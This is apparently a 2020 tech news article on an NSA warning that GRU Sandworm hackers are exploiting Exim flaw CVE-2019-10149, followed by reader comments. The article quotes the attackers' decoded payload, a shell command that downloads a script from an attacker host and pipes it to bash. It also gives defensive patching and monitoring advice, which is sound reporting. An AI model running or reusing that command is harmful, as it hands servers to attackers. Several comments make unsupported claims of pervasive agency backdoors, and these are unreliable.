News: 1590732489

  ARM Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life (Terry Pratchett, Jingo)

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously

(2020/05/29)


The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency [1]said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to [2]CVE-2019-10149 , a security hole in the widely used Exim mail transfer agent (MTA) that was [3]fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters: MAIL FROM:

That hexadecimal decodes to:

/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed [4]Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be [5]found here by Qualys, which found and reported the flaw last year.

American intelligence follows British lead in warning of serious VPN vulnerabilities [6]READ MORE

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also [7]previously targeted energy utilities, by some reports.

The Sandworm hacking group has also previously [8]been linked to attacks on a research lab in Britain, and the nation's Foreign Office.

The exploit of CVE-2019-10149 by the Sandworm crew has been on-going since August, the NSA said. Fortunately, there has also been a fix out for this bug for nearly a year – the flaw was introduced in Exim 4.87 and patched back in June of 2019.

Updating Exim to version 4.93 or later will close off the vulnerability. While admins can [9]download the update , using your Linux distro's package manager will be the easiest way to get the fix, if for some reason you don't already have it.

Admins are also advised to keep a close eye on their servers to check for suspicious activity, such as new accounts being added or security settings being changed.

"Routinely verifying no unauthorized system modifications, such as additional accounts and SSH keys, have occurred can help detect a compromise," noted the NSA. "To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system.

"If an MTA DMZ was configured in a least access model, for example to deny by default MTA initiated outbound traffic destined for port 80/443 on the internet while only permitting traffic initiated from an MTA to necessary hosts on port 80/443, the actors’ method of using CVE-2019-10149 would have been mitigated." ®



[1] https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf

[2] https://nvd.nist.gov/vuln/detail/CVE-2019-10149

[3] https://www.exim.org/static/doc/security/CVE-2019-10149.txt

[4] https://www.theregister.co.uk/2020/02/20/apt28_hacked_georgia_uk_us_declaration/

[5] https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

[6] https://www.theregister.co.uk/2019/10/10/nsa_ncsc_vpn_warnings/

[7] https://www.theregister.co.uk/2018/03/15/dhs_fbi_blame_russian_government_for_dragonfly_attack_on_infrastructure/

[8] https://www.theregister.co.uk/2018/10/04/gru_opcw_hack_bust/

[9] https://exim.org/mirrors.html

David Shaw

do you want me to post the email embedded javascript obfuscated code that was included in an email from the BBC to a child of mine?, I attribute it to Gloucestershire.

Or I could add the mail-bomb script that the NSA embedded in a fake email to me "from the ITU"?

The Russian/GRU attack that I noticed was much more subtle, such that nobody seemed particularly interested - it involved a special offer on software, a slow social engineered creep of app permissions, to a full MITM - whilst pretending to be a cloud AV, over six months....

this information war stuff is very multilateral, read wider

Anonymous Coward

Agreed. But it's even worse than that, it's very widespread these days, in fact, I'd say it's totally pervasive.

My default position now is that all email systems and cloud services have backdoors / hacked by 3/4 letter agencies. Even antivirus software. A very puzzling series of events during this month led me to the ultimation conclusion regarding the latter. I think anyone who disagrees is being naive.

And then there's firmware and bios hacks...

The bigger story ..... to relentless exploit and engage with

amanfromMars 1

Agreed. But it's even worse than that, it's very widespread these days, in fact, I'd say it's totally pervasive.

My default position now is that all email systems and cloud services have backdoors / hacked by 3/4 letter agencies. Even antivirus software. ..... Anonymous Coward

What one fails to do to remedy anything from global conflict to domestic strife with all of that information available at one's fingertips is surely the result of a lack of human intelligence rather than any exercise of it.

Does such indicate most all human intelligence systems are corrupted and perverted and subversive .... and be totally unfit for Future Lead with Greater IntelAIgent Games Use Employing Virtually Remote Core Instructions?

And that is at least six questions be answered if you can be bothered to be bothered. :-) ...... for apathy is a constant companion to both ignorance and arrogance alike.

incredible blunder

Steve Graham

The Exim developer who caused the bug needs to be taken aside for some "re-education" in the old KGB style.

Perhaps no person can be a poet, or even enjoy poetry without a certain
unsoundness of mind.
-- Thomas Macaulay